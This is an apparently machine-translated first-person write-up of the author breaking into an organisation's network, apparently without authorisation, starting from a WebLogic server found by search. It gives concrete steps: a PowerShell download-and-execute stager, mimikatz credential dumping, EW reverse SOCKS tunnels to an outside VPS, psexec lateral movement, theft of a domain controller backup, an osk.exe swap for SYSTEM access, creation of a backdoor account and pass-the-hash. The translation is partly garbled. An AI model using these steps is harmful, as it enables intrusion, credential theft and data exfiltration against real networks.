Title: Record a complete intranet penetration experience

The cause of the story is relatively simple, so let’s summarize it in three words: I’m so idle.

Because I mainly want to practice the intranet, I used the simplest and most crude method to find the target. I used fofa to batch a wave of weblogic, and found the target within a while.

I simply looked at the machine environment, and there was no software kill (I found out later that there was actually a very niche firewall, but it did not block powershell), and there was an intranet environment.

So here we directly try the Scripted Web Delivery module that comes with CSS, and directly create a web service for downloading and executing powershells in one-click.

Run the powershell you just generated

CS here has been successfully launched.

Here we first look at the system information.

According to the above, it can be seen that the server is 2012, and the intranet IP segment is 192.168.200.x

Then I used Ladon to scan the intranet environment.

There are not many machines in this intranet segment, and it can be seen that there is a domain environment. Then, multi-network card detection and web detection were carried out.

It can be seen that this intranet has multiple network segments and a web service is opened.

mimikatz only reads one user and encrypted password

The password can be unlocked on CMD5

Next is the most exciting scan of MS17010!

It can be seen that there are several machines that may have MS17010, so I plan to open a socks agent and directly use MSF to hit it.

Here, I advise everyone to try to buy servers that are billed according to the quantity when buying servers. Don’t be greedy for a temporary advantage like me. I bought a HK server with only 1M bandwidth. The socks agent that comes with CS is opened, and the local test connection fails, let alone other operations.

So here, the author can only temporarily open a server that charges by quantity and reopens a tunnel using EW. The specific process is as follows:

Throw the ew file on the server you just opened and execute: ew -s rcsocks -l 1900 -e 1200 to configure a forwarding tunnel, which means forwarding the proxy request received by port 1900 to the host of port 1200 in the reverse connection

Then upload the ew file on the target machine and execute: ew -s rssocks -d xxx.xxx.xxx.xxx (server IP created above) -e 1200, enable the target host socks5 service and connect to the 1200 port of the relay machine in reverse. After execution, you will see that an additional line of connection is completed.

Then just need to configure the proxy locally and it will be OK.

For Windows programs, you can usually use sockscap to configure the following proxy.

Because we want to use kali's MSF in the local virtual machine, kali's proxy configuration is more convenient. First, vim /etc/proxychains.conf and add a proxy at the bottom.

After saving, directly add proxychains to the program to be started and hang up the proxy.

For example, if we want to hang the proxy, we should directly: proxychains msfconsole

The road to the intranet is always so bumpy. After experiencing EXP, changing tools + shaking people, I confirmed that MS17010 is indeed impossible to use.

Since you can't take the shortcut, then change the path and start with the web.

I tried weak password injection and other things, but I couldn't translate it even if Google Translates couldn't understand it even if I entered the background. I'd better find other ways.

So further information collection began:

View save login credentials, no

View a list of shared computers

Then I started trying to access the shared computer's C drive

On the last one, I found that I had successfully accessed it

Ping the machine to get IP 192.168.200.6

Right-click a beacon to create a listener

Then use psexec_psh to try online the server 192.168.200.6

Successfully launched

Next, we will collect information on the newly launched machines

No other discoveries

Next, go back to the starting point and see which machines there are in this network segment

You can see that there are four Linux machines, namely 22, 1, 5, 11

At this time we can try a wave of weak passwords.

I can only say that luck is a little less

I simply checked the information about processes and did not find that although I had already taken down two intranet machines at this time, they were not in-domain machines. The other Linux hosts tested weak passwords and were incorrect, and then they were in a deadlock again.

At this time, I saw that the machine I took down .6 was named veeam backup. I guessed that this might be a backup server and there might be backup files in his hard disk, so I carefully checked the contents of each of his folders.

I can only say that luck cannot be stopped when it comes.

In the folder on disk D, a folder called Backup was found, which stores backups of three machines.

I simply finished the suffix on Baidu and found that it is a software called Veeam® Backup Replication. Its function is to make backups for Vsphere and others.

In an instant, my thoughts became clear, I just needed to install Veeam® Backup locally

Replication software then compresses the full backup package of this DC to the local area, restores it to a virtual machine, and then renames it through PE and renames it with CMD.EXE. In this way, you can call up the system command line in the login interface, and then find a way to add an administrator account or modify the administrator account to enter the interface, launch CS locally, and then hashdump to directly read out the stored user HASH user in the domain, and then directly get the online DC through Pth.

He did it as he said, because this backup server did not leave the network, but he and the 21 network-release machine have a shared folder. In order to facilitate his behavior, he secretly created a hidden account on the backup server, and directly 7z compressed the latest DC full backup into a 700M compression package, and placed it all in the shared folder.

The machine that is out of the network also has only port 7001, so it found the weblogic web path, put all the compressed packages into the web path from the shared folder, and downloaded them from the web side. Because the bandwidth of this network-out machine is too low, the average speed is 200K, and it keeps getting stuck, it finally got off after a long wait.

During this long download process, I downloaded the Veeam® Backup Replication software this machine first.

Suddenly I found a very interesting thing, which is that he can support logging in with a local administrator account.

And because he backed up virtual machines with other IPs, I guess he should have logged into Vsphere.

So I hooked up the agent and checked it out again. Sure enough, I guessed it right, Wuhu took off. Equivalent to administrator privileges.

The full backup downloaded locally is also very simple to restore locally. Just double-click the software and automatically open the software.

Restore completed

The next step is simple. Download Lao Maotao and generate an ISO PE toolbox

Mount to the virtual machine, press ESC on the power

After entering PE, renaming cmd.exe to osk.exe will overwrite the original C disk \windows\system32\osk.exe. In this way, when you turn on the screen keyboard when you turn on the computer, the command line with SYSTEM permissions will pop up.

Some problems occurred when directly adding users here.

Finally, after modifying the password of a domain user, it added to the local administrator group and successfully entered the system.

When the final generation of the exe was launched, the Hanpi firewall finally started to be protected.

Give Hanhan firewall a front view.

TMD is still following me on my local virtual machine? I won't shut you down.

However, you need a password to close - forget it, bear it.

Finally, it was launched with the original powershell.

Then the most ritual scene

In the end, you just need to use the hash to fight the online DC and it's all done.

After finishing work and going to bed.

Summary

1. Searching for the target system through fofa adopts the weblogic framework, and executable commands through weblogic using tools. Here, upload a sentence of Ice Scorpion to the target website system. It was also found that there was a niche firewall in the target system, and after testing, the firewall did not intercept the ps script. 2. On VPS, use the Scripted Web Delivery module that comes with CD, and directly create a web service for downloading and executing powershels in one click. URL path: /a/123 Host address: Target system IP port: 80 Listener: https Type: poseshell3. Execute powershel, and then CS is successfully launched. 4. Query the target system information through the C command and found that the target system is win2012 and the target intranet IP is 192.168.200.21shell systeminfoshell ipconfig5. Upload the Ladon to the target system through cs, scan the intranet system through ladon, and find that the target has a WEB service host. landon 192.168.200.1/24 OsScan6. The user name and password hash value are successfully read through mimikatz, and the password NTML is decrypted through md5, and successfully decrypted to P@sssw0rd. 7. Batch ms17-010 scan through ladon and found that there are ms17-010 vulnerabilities in several systems. Landon 192.168.200.1/24 MS170108. Execute the following command on the public network VPS to forward the proxy request received by port 1900 to the host ew that is back-connected to port 1200 ew -s rcsocks -l 1900 -e 12009. Upload ew through ice scorpion to the target system, and execute the following command, enable the target host socks5 service and reversely connect to port 1200 of the relay machine ew -s rssocks -d xxx.xxx.xxx.xxx.xxx (public network VPS IP) -e 120010. Local WINDOWS uses sockscap locally to configure the sock5 proxy. The MSF of Kali in the local virtual machine. The kali proxy configuration is more convenient. First, vim /etc/proxychains.conf, add sock5 to socks5 target IP 190011. In kali, if you want to hang the proxy, just: proxychains msfconsole. In sockscap, add the socks5 proxy accessed by IBrowser in sockscap, which is used for intranet web access, but test weak passwords and find it impossible to enter.

12. Continue to collect information, view login credentials, and have anything shell cmdkey /l13. View the list of shared computers and try to access the computer C disk. I found that the backup computer can access the shared shell ne views \\VEEAM-BACKUP\$14. By ping the target shared computer, query the IP address is 192.168.200.6ping VEEAM-BACKUP15. Create a listener on CS to relay---listen--name (c2), payload (windows/beacon_reverse_tcp), listen host :192.168.200.21, listen port:444416. Then use psexec_psh to try to go online 192.168.200.6, which was successfully launched. At first, I found that there was nothing on the host jump psexec _psh 192.168.200.617. Through previous ladon detection, it was found that the hosts 22, 1, 5, and 11 in the intranet were Linux systems. I tried weak passwords and found that there was a weak password in 192.168.200.22, and there was no available ssh on the linux host. 192.168.200.22 root 12345618. I found a Backup file on the VEEAM-BACKUP host, which stores backups of three machines. It is a Veeam® Backup Replication's software, its function is to make backups specifically for Vsphere and others. 19. I found that VEEAM-BACKUP does not go out of the outside network. Here I use 7z to package and compress the Backup file. In the web directory in the target system, copy the Backup file to the target system through command sharing. 19. Install Backup Replication locally and restore the backup file. I found that the login window has the default username, password and IP. This requires login in the target intranet. Here, you can successfully access the sock4 proxy that loads Backup Replication locally through Proxifier by enabling the sock4 proxy. 20. The full backup downloaded locally is also very simple to restore locally. Just install the software and double-click it and automatically open the software for restoration. 21. Enter the system through Lao Maotao's win pe. Here, rename cmd.exe to osk.exe here to overwrite the original C disk \windows\system32\osk.exe. In this way, when you turn on the screen keyboard, the SYSTEM permission command line will pop up. 22. Through command query, it was found that the restored system was a normal domain host. Here, the domain user was added to the local administrator group and successfully entered the system after adding it to the local administrator group through command addition. net user hanli quer1345 @ /addnet localgroup administrators hanli /add23. It successfully goes online in the virtual machine through the backdoor of cs, and read the hash through the hasdump of cs, and passes the original link through the hash through the hash: https://xz.aliyun.com/t/9374